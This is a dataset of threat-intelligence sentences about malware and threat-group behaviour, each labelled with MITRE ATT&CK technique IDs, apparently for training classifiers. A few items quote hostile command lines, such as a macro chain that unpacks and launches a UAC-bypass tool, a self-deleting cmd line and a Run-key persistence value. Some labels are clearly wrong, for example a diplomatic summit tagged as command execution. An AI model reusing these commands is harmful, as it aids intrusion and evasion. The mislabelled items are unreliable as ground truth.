{"text1":"uses a large list of C2 servers that it cycles through until a successful connection is established.","labels":"['T1008']"}
|
|
{"text1":"uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.","labels":"['T1110']"}
|
|
{"text1":"uses a modified version of pentesting script wmiexec.vbs, which logs into a remote machine using WMI.","labels":"['T1047']"}
|
|
{"text1":"uses a module to execute Mimikatz with PowerShell to perform .","labels":"['T1064', 'T1059.001']"}
|
|
{"text1":"uses a module to receive a notification every time a USB mass storage device is inserted into a victim.","labels":"['T1120']"}
|
|
{"text1":"uses and other Active Directory utilities to enumerate hosts.","labels":"['T1018']"}
|
|
{"text1":"uses a Port 22 malware variant to modify several Registry keys.","labels":"['T1112']"}
|
|
{"text1":"uses a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1059.001']"}
|
|
{"text1":"uses AppleScript to create a login item for persistence.","labels":"['T1059.002']"}
|
|
{"text1":"uses a simple one-byte XOR method to obfuscate values in the malware.","labels":"['T1027']"}
|
|
{"text1":"uses a sophisticated keylogger.","labels":"['T1056']"}
|
|
{"text1":"uses a specific port of 443 and can also use ports 53 and 80 for C2. One variant uses HTTP over port 443 to connect to its C2 server.","labels":"['T1043']"}
|
|
{"text1":"uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.","labels":"['T1091']"}
|
|
{"text1":"uses a variation of the XOR cipher to encrypt files before exfiltration.","labels":"['T1486']"}
|
|
{"text1":"uses a virus that propagates by infecting executables stored on shared drives.","labels":"['T1080']"}
|
|
{"text1":"uses a WMI event subscription to establish persistence.","labels":"['T1546.003']"}
|
|
{"text1":"uses Base64 encoding for C2 traffic.","labels":"['T1132']"}
|
|
{"text1":"uses Base64 encoding for communication in the message body of an HTTP request.","labels":"['T1132']"}
|
|
{"text1":"uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.","labels":"['T1102']"}
|
|
{"text1":"uses character replacement, environment variables, and XOR encoding to obfuscate code.","labels":"['T1027']"}
|
|
{"text1":"uses cloud based services for C2.","labels":"['T1102']"}
|
|
{"text1":"uses cmd.exe and \/bin\/bash to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"uses cmd.exe to execute commands for discovery.","labels":"['T1059']"}
|
|
{"text1":"uses cmd.exe to execute commands on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"uses cmd.exe to execute scripts and commands on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"uses cmd.exe to run commands for enumerating the host.","labels":"['T1059']"}
|
|
{"text1":"uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.","labels":"['T1059']"}
|
|
{"text1":"uses COM hijacking as a method of persistence.","labels":"['T1546.015']"}
|
|
{"text1":"uses command line for execution.","labels":"['T1059']"}
|
|
{"text1":"uses commands such as netsh advfirewall firewall to discover local firewall settings.","labels":"['T1518.001']"}
|
|
{"text1":"uses commands such as netsh interface show to discover network interface settings.","labels":"['T1016']"}
|
|
{"text1":"uses credential dumpers such as and to extract cached credentials from Windows systems.","labels":"['T1003']"}
|
|
{"text1":"uses custom base64 encoding to obfuscate HTTP traffic.","labels":"['T1132']"}
|
|
{"text1":"uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.","labels":"['T1574.001']"}
|
|
{"text1":"uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","labels":"['T1574.002']"}
|
|
{"text1":"uses DLL side-loading to load malicious programs.","labels":"['T1574.002']"}
|
|
{"text1":"uses DNS as its C2 protocol.","labels":"['T1071']"}
|
|
{"text1":"uses DNS for C2.","labels":"['T1071']"}
|
|
{"text1":"uses DNS for the C2 communications.","labels":"['T1071']"}
|
|
{"text1":"uses DNS TXT records for C2.","labels":"['T1071']"}
|
|
{"text1":"uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended desitnation.","labels":"['T1090.004']"}
|
|
{"text1":"uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.","labels":"['T1027']"}
|
|
{"text1":"uses FakeTLS to communicate with its C2 server.","labels":"['T1573']"}
|
|
{"text1":"uses fake Transport Layer Security (TLS) to communicate with its C2 server, encoding data with RC4 encryption.","labels":"['T1573']"}
|
|
{"text1":"uses file and folder names related to legitimate programs in order to blend in, such as HP, Intel, Adobe, and perflogs.","labels":"['T1036']"}
|
|
{"text1":"uses FTP for command and control.","labels":"['T1071']"}
|
|
{"text1":"uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server.","labels":"['T1071']"}
|
|
{"text1":"uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.","labels":"['T1008']"}
|
|
{"text1":"uses HTTP, HTTPS, FTP, and FTPS to communicate with the C2 server. can also act as a webserver and listen for inbound HTTP requests through an exposed API.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP and HTTPS for C2.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP and HTTPS for command and control.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP and HTTPS to communicate with the C2 server.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP as a transport to communicate with its command server.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for C2 communication.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for C2 communications.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for command and control communication.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for communication to the control servers.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP for communication with the C2 server.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP or HTTPS for C2.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP over SSL to communicate commands with the control server.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP POST requests with data formatted using a custom protocol.","labels":"['T1095']"}
|
|
{"text1":"uses HTTPS, HTTP, and DNS for C2 communications.","labels":"['T1071']"}
|
|
{"text1":"uses HTTPS for C2.","labels":"['T1071']"}
|
|
{"text1":"uses HTTPS for C2 communications.","labels":"['T1071']"}
|
|
{"text1":"uses HTTPS for command and control.","labels":"['T1071']"}
|
|
{"text1":"uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.","labels":"['T1071']"}
|
|
{"text1":"uses HTTP TCP port 80 and HTTPS TCP port 443 for communications.","labels":"['T1043']"}
|
|
{"text1":"uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.","labels":"['T1071']"}
|
|
{"text1":"uses ipconfig \/all and route PRINT to identify network adapter and interface information.","labels":"['T1016']"}
|
|
{"text1":"uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641.","labels":"['T1203']"}
|
|
{"text1":"uses Microsoft\u2019s TechNet Web portal to obtain a dead drop resolver containing an encoded tag with the IP address of a command and control server. It has also obfuscated its C2 traffic as normal traffic to sites such as Github.","labels":"['T1102']"}
|
|
{"text1":"uses Microsoft\u2019s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2. If the C2 server is discovered or shut down, the threat actors can update the encoded IP address on TechNet to maintain control of the victims\u2019 machines.","labels":"['T1104']"}
|
|
{"text1":"uses mshta.exe to load its program and files.","labels":"['T1218.005']"}
|
|
{"text1":"uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful.","labels":"['T1008']"}
|
|
{"text1":"uses multiple techniques to obfuscate strings, including XOR.","labels":"['T1027']"}
|
|
{"text1":"uses netstat -ano to search for specific IP address ranges.","labels":"['T1049']"}
|
|
{"text1":"uses Pastebin to store its real C2 addresses.","labels":"['T1102']"}
|
|
{"text1":"uses port 443 for C2.","labels":"['T1043']"}
|
|
{"text1":"uses port 443 for C2 communications.","labels":"['T1043']"}
|
|
{"text1":"uses port 46769 for C2.","labels":"['T1571']"}
|
|
{"text1":"uses port 8000 and 443 for C2.","labels":"['T1043']"}
|
|
{"text1":"uses port 8080 for C2.","labels":"['T1043']"}
|
|
{"text1":"uses port 80 for C2.","labels":"['T1043']"}
|
|
{"text1":"uses Port Numbers 443 and 80 for the C2 server.","labels":"['T1043']"}
|
|
{"text1":"uses ports 447 and 8082 for C2 communications.","labels":"['T1571']"}
|
|
{"text1":"uses ports 80, 443, and 8080 for C2.","labels":"['T1043']"}
|
|
{"text1":"uses PowerShell for execution.","labels":"['T1059.001']"}
|
|
{"text1":"uses PowerShell scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"uses PowerShell to add a Registry Run key in order to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"uses PowerView and Pywerview to perform discovery commands such as net user, net group, net local group, etc.","labels":"['T1087']"}
|
|
{"text1":"uses public sites such as github.com and sendspace.com to upload files and then download them to victim computers.","labels":"['T1105']"}
|
|
{"text1":"uses Putty and VNC for lateral movement.","labels":"['T1021']"}
|
|
{"text1":"uses RC4 and Base64 to obfuscate strings.","labels":"['T1027']"}
|
|
{"text1":"uses RC4 encryption to obfuscate HTTP traffic.","labels":"['T1573']"}
|
|
{"text1":"uses RC4 to encrypt C2 traffic.","labels":"['T1573']"}
|
|
{"text1":"uses RC4 to encrypt the message body of HTTP content.","labels":"['T1573']"}
|
|
{"text1":"uses RDP to tunnel traffic from a victim environment.","labels":"['T1071']"}
|
|
{"text1":"uses reflective DLL injection to inject the malicious library and execute the RAT.","labels":"['T1055']"}
|
|
{"text1":"uses reg add to add a Registry Run key for persistence.","labels":"['T1112']"}
|
|
{"text1":"uses remote services such as VPN, Citrix, or OWA to persist in an environment.","labels":"['T1133']"}
|
|
{"text1":"uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.","labels":"['T1218.011']"}
|
|
{"text1":"uses rundll32.exe to execute as part of the Registry Run key it adds: HKEY_CURRENT_USER \\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\u201dvert\u201d = \u201crundll32.exe c:\\windows\\temp\\pvcu.dll , Qszdez\u201d.","labels":"['T1218.011']"}
|
|
{"text1":"uses rundll32.exe to load its DLL.","labels":"['T1218.011']"}
|
|
{"text1":"uses Rundll32 for executing the dropper program.","labels":"['T1218.011']"}
|
|
{"text1":"uses rundll32 to call an exported function.","labels":"['T1218.011']"}
|
|
{"text1":"uses Rundll32 to ensure only a single instance of itself is running at once.","labels":"['T1218.011']"}
|
|
{"text1":"uses Rundll32 to load a malicious DLL.","labels":"['T1218.011']"}
|
|
{"text1":"uses rundll32 within entries to execute malicious DLLs.","labels":"['T1218.011']"}
|
|
{"text1":"uses run keys for persistence on Windows","labels":"['T1547.001']"}
|
|
{"text1":"uses scheduled tasks typically named \"Watchmon Service\" for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"uses scripts to enumerate IP ranges on the victim network. has also issued the command net view \/domain to a implant to gather information about remote systems on the network.","labels":"['T1018']"}
|
|
{"text1":"uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.","labels":"['T1574.001']"}
|
|
{"text1":"uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file.","labels":"['T1569.002', 'T1543.003']"}
|
|
{"text1":"uses single-byte XOR obfuscation to obfuscate many of its files.","labels":"['T1027']"}
|
|
{"text1":"uses SSL\/TLS and RC4 to encrypt traffic.","labels":"['T1573']"}
|
|
{"text1":"uses SSL to encrypt its communication with its C2 server.","labels":"['T1071']"}
|
|
{"text1":"uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA).","labels":"['T1027']"}
|
|
{"text1":"uses svchost.exe to execute a malicious DLL included in a new service group.","labels":"['T1569.002']"}
|
|
{"text1":"uses systeminfo on a victim\u2019s machine.","labels":"['T1082']"}
|
|
{"text1":"uses tasklist \/v to check running processes.","labels":"['T1057']"}
|
|
{"text1":"uses the API call ShellExecuteW for execution.","labels":"['T1106']"}
|
|
{"text1":"uses the Camellia cipher to encrypt communications.","labels":"['T1573']"}
|
|
{"text1":"uses the certutil command to decode a payload file.","labels":"['T1140']"}
|
|
{"text1":"uses the command line.","labels":"['T1059']"}
|
|
{"text1":"uses the command line and rundll32.exe to execute.","labels":"['T1059']"}
|
|
{"text1":"uses the command-line interface.","labels":"['T1059']"}
|
|
{"text1":"uses the command-line interface to execute arbitrary commands.","labels":"['T1059']"}
|
|
{"text1":"uses the command prompt to execute commands on the victim's machine.","labels":"['T1059']"}
|
|
{"text1":"uses the command reg query \u201cHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\InternetSettings\u201d.","labels":"['T1012']"}
|
|
{"text1":"uses the Confuser protector to obfuscate an embedded .Net Framework assembly used for C2. also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.","labels":"['T1027']"}
|
|
{"text1":"uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the malware.","labels":"['T1105']"}
|
|
{"text1":"uses the Dropbox cloud storage service for command and control.","labels":"['T1102']"}
|
|
{"text1":"uses the email platform, Naver, for C2 communications, leveraging SMTP.","labels":"['T1071']"}
|
|
{"text1":"uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\; the malicious file by the same name is saved in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\.","labels":"['T1036']"}
|
|
{"text1":"uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation.","labels":"['T1027']"}
|
|
{"text1":"uses the ipconfig \/all command to gather the victim\u2019s IP address.","labels":"['T1016']"}
|
|
{"text1":"uses the ipconfig command.","labels":"['T1016']"}
|
|
{"text1":"uses the keychaindump project to read securityd memory.","labels":"['T1555.002']"}
|
|
{"text1":"uses the Microsoft utility to list processes running on systems.","labels":"['T1057']"}
|
|
{"text1":"uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.","labels":"['T1018']"}
|
|
{"text1":"uses the net user command.","labels":"['T1087']"}
|
|
{"text1":"uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\\Intel\\Skype.","labels":"['T1123', 'T1125']"}
|
|
{"text1":"uses the tasklist to view running processes on the victim\u2019s machine.","labels":"['T1057']"}
|
|
{"text1":"uses the Windows API call, CreateProcessW(), to manage execution flow.","labels":"['T1106']"}
|
|
{"text1":"uses to clean up the environment and attempt to prevent detection.","labels":"['T1070.004']"}
|
|
{"text1":"uses to execute a payload or commands on a remote host.","labels":"['T1569.002']"}
|
|
{"text1":"uses to inject shellcode into PowerShell.","labels":"['T1059.001']"}
|
|
{"text1":"uses Twitter as a backup C2 method. It also has a module designed to post messages to the Russian VKontakte social media site.","labels":"['T1102']"}
|
|
{"text1":"uses variations of a simple XOR encryption routine for C&C communications.","labels":"['T1573']"}
|
|
{"text1":"uses various WMI queries to check if the sample is running in a sandbox.","labels":"['T1047']"}
|
|
{"text1":"uses VBScripts and batch scripts.","labels":"['T1064']"}
|
|
{"text1":"uses VNC to connect into systems.","labels":"['T1021']"}
|
|
{"text1":"uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page.","labels":"['T1185']"}
|
|
{"text1":"uses Web shells on publicly accessible Web servers to access victim networks.","labels":"['T1505.003']"}
|
|
{"text1":"uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1047', 'T1518.001']"}
|
|
{"text1":"uses WMI to check for anti-virus software installed on the system.","labels":"['T1518.001']"}
|
|
{"text1":"uses WMI to perform discovery techniques.","labels":"['T1047']"}
|
|
{"text1":"uses XOR with random keys for its communications.","labels":"['T1573']"}
|
|
{"text1":"uses ZPP, a .NET console program, to compress files with ZIP.","labels":"['T1560']"}
|
|
{"text1":"variants can add malicious DLL modules as new services.","labels":"['T1543.003']"}
|
|
{"text1":"variants can use ports 443, 8443, and 8080 for communications.","labels":"['T1043']"}
|
|
{"text1":"variants have attempted to appear legitimate by using the file names SafeApp.exe and NeutralApp.exe, as well as by adding a new service named OfficeUpdateService.","labels":"['T1036']"}
|
|
{"text1":"variants have communicated with C2 servers over HTTP and HTTPS.","labels":"['T1071']"}
|
|
{"text1":"Variants of achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% (C:\\WINDOWS\\ntshrui.dll).","labels":"['T1574.001']"}
|
|
{"text1":"Variants of encrypt payloads using various XOR ciphers, as well as a custom algorithm that uses the \"srand\" and \"rand\" functions.","labels":"['T1027']"}
|
|
{"text1":"Variants of have added Run Registry keys to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"Variants of have used rundll32.exe in Registry values added to establish persistence.","labels":"['T1218.011']"}
|
|
{"text1":"variants reported on in 2014 and 2015 used a simple XOR cipher for C2.","labels":"['T1573']"}
|
|
{"text1":"Various implementations of communicate with C2 over HTTP, SMTP, and POP3.","labels":"['T1071']"}
|
|
{"text1":"Various malware enumerates logged-on users.","labels":"['T1033']"}
|
|
{"text1":"version of adds a registry key to HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run for persistence.","labels":"['T1547.001']"}
|
|
{"text1":"versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\"","labels":"['T1553.002']"}
|
|
{"text1":"was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.","labels":"['T1195']"}
|
|
{"text1":"was distributed through a compromised update to a Tor client with a coin miner payload.","labels":"['T1195']"}
|
|
{"text1":"was distributed through torrent file-sharing websites to South Korean victims, using a YouTube video downloader application as a lure.","labels":"['T1189']"}
|
|
{"text1":"was likely obfuscated using Invoke-Obfuscation.","labels":"['T1027']"}
|
|
{"text1":"When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.","labels":"['T1020']"}
|
|
{"text1":"When it first starts, crawls the victim's local drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1005']"}
|
|
{"text1":"When it first starts, crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","labels":"['T1039']"}
|
|
{"text1":"will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000.","labels":"['T1008']"}
|
|
{"text1":"will attempt to detect if the infected host is configured to a proxy. If so, will send beacons via an HTTP POST request; otherwise it will send beacons via UDP\/6000. will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2. Adversaries can also use to establish an RDP connection with a controller over TCP\/7519.","labels":"['T1071']"}
|
|
{"text1":"will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.","labels":"['T1021.002']"}
|
|
{"text1":"will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"","labels":"['T1573']"}
|
|
{"text1":"will identify Microsoft Office documents on the victim's computer.","labels":"['T1005']"}
|
|
{"text1":"will inject itself into different processes to evade detection. The selection of the target process is influenced by the security software that is installed on the system (Duqu will inject into different processes depending on which security suite is installed on the infected host).","labels":"['T1055']"}
|
|
{"text1":"will sleep until after a date\/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim.","labels":"['T1108']"}
|
|
{"text1":"will timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
|
|
{"text1":"will use an 8-byte XOR key derived from the string HYF54&%9&jkMCXuiS instead if the DES decoding fails.","labels":"['T1573']"}
|
|
{"text1":"writes data into the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Pniumj.","labels":"['T1112']"}
|
|
{"text1":"writes multiple outputs to a TMP file using the >> method.","labels":"['T1074']"}
|
|
{"text1":"zips up files before exfiltrating them.","labels":"['T1560']"}
|
|
{"text1":"\u2019s installer is obfuscated with a custom crypter to obfuscate the installer.","labels":"['T1027']"}
|
|
{"text1":"\u2019s Java payload is encrypted with AES.","labels":"['T1027']"}
|
|
{"text1":"\u2019s LSADUMP::DCShadow module can be used to make AD updates by temporarily setting a computer to be a DC.","labels":"['T1207']"}
|
|
{"text1":"\u2019s LSADUMP::DCSync, KERBEROS::Golden, and KERBEROS::PTT modules implement the three steps required to extract the krbtgt account hash and create\/use Kerberos tickets.","labels":"['T1550.003']"}
|
|
{"text1":"From these reports, we know that the group uses an abundance of tools and tactics, ranging across zero-day exploits targeting common applications such as Java or Microsoft Office, heavy use of spear-phishing attacks, compromising legitimate websites to stage watering-hole attacks, and targeting over a variety of operating systems \u2013 Windows, OSX, Linux, even mobile iOS","labels":"['T1189']"}
|
|
{"text1":"We believe this access was abused, for example, by inserting malicious scripts in the country\u2019s official websites in order to conduct watering hole attacks","labels":"['T1189']"}
|
|
{"text1":"This targeting of third party organizations to attack further targets is a risky move on the attackers\u2019 part, as it potentially reveals their activity within the compromised third party organizations to the new target (those receiving the malicious documents Making sense of MuddyWater When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East, we were somewhat confused as the previous public reporting had attributed these attacks to FIN7","labels":"['T1189']"}
|
|
{"text1":"Online news outlets and general websites were breached and weaponized as a vehicle for watering hole attacks","labels":"['T1189']"}
|
|
{"text1":"The payload delivered in these November 2017 attacks using DDE enabled documents was SofacyCarberp, which differs from the Zebrocy downloader delivered in the February 2018 attacks","labels":"['T1189']"}
|
|
{"text1":"Like many threat groups, TG-3390 conducts strategic web compromises (SWCs), also known as watering hole attacks, on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information","labels":"['T1189']"}
|
|
{"text1":"Threat actors compromise a website used by their target demographic (e.g., compromising a website specializing in oil and gas industry news when targeting the energy vertical)","labels":"['T1189']"}
|
|
{"text1":"The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059']"}
|
|
{"text1":"This indicates that a human operative was executing commands on a command line style interface, rather than an automated or GUI process","labels":"['T1059']"}
|
|
{"text1":"Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement","labels":"['T1059']"}
|
|
{"text1":"After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line","labels":"['T1059']"}
|
|
{"text1":"The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters","labels":"['T1059']"}
|
|
{"text1":"These commands are also executed when the loadconfig command is issued","labels":"['T1059']"}
|
|
{"text1":"The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it","labels":"['T1059']"}
|
|
{"text1":"Glimpse\u2019s Agent Control Panel showing the interface actors would use to send commands The actor clicks the command to view the results in a popup window named \u201cResult Viewer\u201d","labels":"['T1059']"}
|
|
{"text1":"This script relays commands and output between the controller and the system","labels":"['T1059']"}
|
|
{"text1":"RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool","labels":"['T1059']"}
|
|
{"text1":"These are in-line with the targeting of the victims witnessed by the attackers using Conmie","labels":"['T1059']"}
|
|
{"text1":"Intrusions and campaigns conducted by this group are in-line with PRC goals and self-interest in Taiwan","labels":"['T1059']"}
|
|
{"text1":"Figure 3: ALFA TEaM Shell v2-Fake Mail (Default) Figure 4 shows an example email containing the default values the shell","labels":"['T1059']"}
|
|
{"text1":"Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands","labels":"['T1059']"}
|
|
{"text1":"Though this is unsophisticated, a remote shell does provide a highly flexible and powerful means of remote access in the hands of a skilled attacker","labels":"['T1059']"}
|
|
{"text1":"!CMD Trojan executes a command prompt command","labels":"['T1059']"}
|
|
{"text1":"The Trojan will save the output of the command to %TEMP%\\win<random number>.txt and send the contents to the C2 server or \u201cThe length of Cmd result file is ziro!\u201d if the command was unsuccessful","labels":"['T1059']"}
|
|
{"text1":"The Visual Basic macro uses the following command line: cmd \/c expand %TEMP%\\setup.cab -F:* %TEMP% && cd \/d %TEMP% && del \/f \/q setup.cab && uacme.exe The control server credential information contained in the CAB files is different: Decoded credential data contained in another ipnet.ini","labels":"['T1059']"}
|
|
{"text1":"Remote Shell: The function above is seen throughout many of the binaries in the Mirage family and is executed when a command is sent from the C&C","labels":"['T1059']"}
|
|
{"text1":"It is responsible for executing commands in cmd.exe (later down in the functions, not seen in the screenshot, it looks for cmd.exe and executes it using CreateProcessA)","labels":"['T1059']"}
|
|
{"text1":"This ID is sent to the CnC with each request for commands to execute","labels":"['T1059']"}
|
|
{"text1":"Supported commands \u201cupload\u201c, \u201cscreenshot\u201c, \u201cExcel\u201c, \u201cOutlook\u201c, \u201crisk\u201c, \u201creboot\u201c, \u201cshutdown\u201c, \u201cclean\u201c","labels":"['T1059']"}
|
|
{"text1":"Both create one thread, and each thread is responsible for either downloading and executing the file or running a command line program in the terminal: Figure 28.\u00a0Commands used for downloading and executing, and running a command in terminal Figure 29.\u00a0Commands used in uploading and downloading file Figure 30","labels":"['T1059']"}
|
|
{"text1":"cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin","labels":"['T1059']"}
|
|
{"text1":"Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments","labels":"['T1059']"}
|
|
{"text1":"The malware basically provides a remote CMD\/PowerShell terminal for the attackers, enabling them to execute scripts\/commands and receive the results via HTTP requests","labels":"['T1059']"}
|
|
{"text1":"Execute noninteractive commands on multiple hosts at once","labels":"['T1059']"}
|
|
{"text1":"Open interactive python shells with auto-completion on the all-in-memory remote python interpreter","labels":"['T1059']"}
|
|
{"text1":"Remote shells on Unix & Windows clients have a real tty with all keyboard signals working just like an SSH shell","labels":"['T1059']"}
|
|
{"text1":"Figure 1: SpeakUp\u2019s Victim Distribution Figure 2: SpeakUp\u2019s propagation rate per day Infection Vector The initial infection vector is targeting the recently reported vulnerability in ThinkPHP and uses command injection techniques for uploading a PHP shell that serves and executes a Perl backdoor","labels":"['T1059']"}
|
|
{"text1":"Figure 6: SpeakUp receives additional commands to execute, this time in plain text","labels":"['T1059']"}
|
|
{"text1":"Command\u00a0execution Command execution can create havoc for victim if the malware developer decides to execute commands in the victim\u2019s device","labels":"['T1059']"}
|
|
{"text1":"MURKYTOP: a command-line reconnaissance tool","labels":"['T1059']"}
|
|
{"text1":"The summit is the latest in a line of signs of diplomatic outreach from North Korea, following the Panmunjom Declaration for Peace, Prosperity and Unification of the Korean Peninsula between South Korea and North Korea on April 27, 2018","labels":"['T1059']"}
|
|
{"text1":"The starred commands are undocumented commands","labels":"['T1059']"}
|
|
{"text1":"Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell","labels":"['T1059']"}
|
|
{"text1":"UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe","labels":"['T1059']"}
|
|
{"text1":"This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system","labels":"['T1059']"}
|
|
{"text1":"Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status \/ feedback strings that can give a defender an initial profile of capabilities","labels":"['T1027']"}
|
|
{"text1":"For comparison, if we were to inspect Fysbis \u201cRemoteShell\u201d associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant: Figure 4: Sofacy Fysbis non-stripped binary strings references to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and \u2013 more importantly \u2013 further contribute to correlation and detection across related samples","labels":"['T1027']"}
|
|
{"text1":"That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload","labels":"['T1027']"}
|
|
{"text1":"Messages are encrypted using AES with a static key","labels":"['T1027']"}
|
|
{"text1":"Evidence also supports the hypothesis that there is an encryption plugin for victim files (see below)","labels":"['T1027']"}
|
|
{"text1":"Destructive dstr command in BE2 config file Also, on some machines, documents were encrypted, but no related\u00a0plugin could be\u00a0found","labels":"['T1027']"}
|
|
{"text1":"It is prepended to the encrypted and encoded message","labels":"['T1027']"}
|
|
{"text1":"The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed","labels":"['T1027']"}
|
|
{"text1":"Build Tool Most of CARBANAK\u2019s strings are encrypted in order to make analysis more difficult","labels":"['T1027']"}
|
|
{"text1":"Tool Type Internal Name Industry Name Backdoor Poison Frog BONDUPDATER Backdoor Glimpse Updated BONDUPDATER Webshell HyperShell TwoFace loader Webshell HighShell TwoFace payload Webshell Minion TwoFace payload variant DNS Hijacking Toolkit webmask Related to DNSpionage Table 1","labels":"['T1027']"}
|
|
{"text1":"The HyperShell and HighShell webshells are variants of what we track as TwoFace, with HyperShell being related to the TwoFace loader and HighShell being related to the TwoFace payload, as we reported in July 2017","labels":"['T1027']"}
|
|
{"text1":"Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim\u2019s data","labels":"['T1027']"}
|
|
{"text1":"Configuration Config.ini is the file where the malware stores its encrypted configuration data","labels":"['T1027']"}
|
|
{"text1":"While performing the analysis on the delivery documents using the .sct file AppLocker bypass, we noticed the C# payload was functionally similar to the original RogueRobin payload","labels":"['T1027']"}
|
|
{"text1":"Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state","labels":"['T1027']"}
|
|
